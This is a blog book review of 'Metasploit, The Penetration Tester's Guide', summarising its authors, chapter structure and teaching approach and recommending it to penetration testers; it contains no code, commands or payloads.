Book Review: Metasploit, The Penetration Tester’s Guide

Title: Metasploit, The Penetration Tester’s Guide. Copyright © 2011 by David Kennedy, Jim O’Gorman, Devon Kearns, & Mati Aharoni. Foreword by HD Moore. No Starch Press, Inc. (299 pages).

About the Authors

David Kennedy is Chief Information Security Officer at Diebold Inc. He is also an open-source tools developer and a Back|Track and Exploit Database development team member. Jim O’Gorman is a pen tester with CSC’s StrikeForce, co-founder of Social-Engineer.org, and an instructor at Offensive-Security security training. Devon Kearns is an instructor at Offensive-Security, a Back|Track Linux developer, an administrator of The Exploit Database and maintainer of the Metasploit Unleashed wiki. Mati Aharoni is the creator of the Back|Track Linux distribution and founder of Offensive-Security, security training.

About the Book

According to HD Moore, Metasploit Chief Architect, “In this book, you will see penetration testing through the eyes of four security professionals with widely divergent backgrounds.” The book “covers the fundamental tools and techniques” of penetration testing “while also explaining how they play into the overall structure of a successful penetration testing process…Readers who are new to the field will be presented with a wealth of information not only about how to get started but also why those steps matter and what they mean in the bigger picture.”

The authors themselves write in the Preface that “This book is designed to teach you the ins and outs of Metasploit and how to use the Framework to its fullest.” The goal of the book is to provide a useful tutorial for the beginner and a reference for practitioners. Mindful of the fact that the Metasploit Framework is frequently updated with new features & exploits, the emphasis in the book is on Metasploit fundamentals, which when understood & practised, allow the user to be comfortable with frequent updates.

Summary

Although not formally done so, the book can be considered to be structured in sections, with Chapters 1 to 6 forming the core, and the remaining 11 Chapters building on and around this. The core section takes the pen tester, through use of examples, from the very basics of the craft to not only carrying out exploits, but gaining value from the post-exploitation capabilities of Meterpreter.

The examples used employ a combination of Back|Track, Ubuntu 9.04, Metasploitable, and Windows XP, where Back|Track serves as the vehicle for exploitation, and the Ubuntu and Windows systems act as the target systems. The most-used interfaces to the framework, msfconsole and msfcli, are introduced; and the GUI (armitage) is mentioned briefly. Utilities such as msfpayload (the scripting environment) and msffencode (cleartext encoder), which allow direct access to features supported by the framework, are also introduced early on.

Chapters 3 to 5 cover intelligence gathering, vulnerability scanning and exploit execution respectively, while Chapter 6 introduces Meterpreter. Utilities such as whois, netcraft, nslookup, Nmap, and TCP idle scan, are introduced with good examples showing how their output can be interpreted usefully. Vulnerability scanning is explained by using examples of netcat, NeXpose, and Nessus as well as speciality scanning tools such as vnc_auth & open_x11.

A whole chapter (#5) consists of a walk-through of a specific exploit of Windows XP SP2 (vulnerability MS08- 067) and an Ubuntu 9.02 (virtual) machine. Here, the detailed step-by-step explanation and interpretation of output is impressive. Finally, Chapter 6 walks through another exploit and subsequently takes the pen tester through an overview of the Meterpreter features which can be employed, from capturing screenshots, keystrokes, dumping usernames/passwords, through to pivoting onto connected hosts. For beginners, the above is enough to get up and running productively with Metaspoilt.

Thereafter, more focussed topics such as anti-virus detection and client-side exploitation are covered in detail. The book’s end-section consists of a deep-dive on customising and developing within the Metaspoilt framework. The final Chapter is a simulated planning-to-cleanup pen test.

Conclusion

The craft of penetration testing is covered deeply and broadly. The book’s greatest source of value is how the concepts being applied are explained and demonstrated with well-annotated examples. The authors’ experience in formal instruction and practice is evident. This book achieves a good balance between concept and practicality. Though sub-titled “A Penetration Testers Guide”, the publisher could as well have chosen “A Guide to Penetration Testing” as a strap-line. I expect it to become a valuable resource in most pen tester’s libraries, whether they be novices or experienced practitioners.

The authors on Twitter:

Brian McSweeney
Brian McSweeney is currently a Network Designer, mostly in the UK Enterprise space. He came to Network Design from several years in Network Test Engineering, in particular, Performance & Scalability testing, primarily for Service Provider & Enterprise solution/equipment vendors. He blogs sporadically at http://packetspersecond.wordpress.com His LinkedIn page is http://uk.linkedin.com/in/brianmcsweeney He can also be found on Twitter as @BriMcS & G+ as Brian McSweeney.
Brian McSweeney

Latest posts by Brian McSweeney (see all)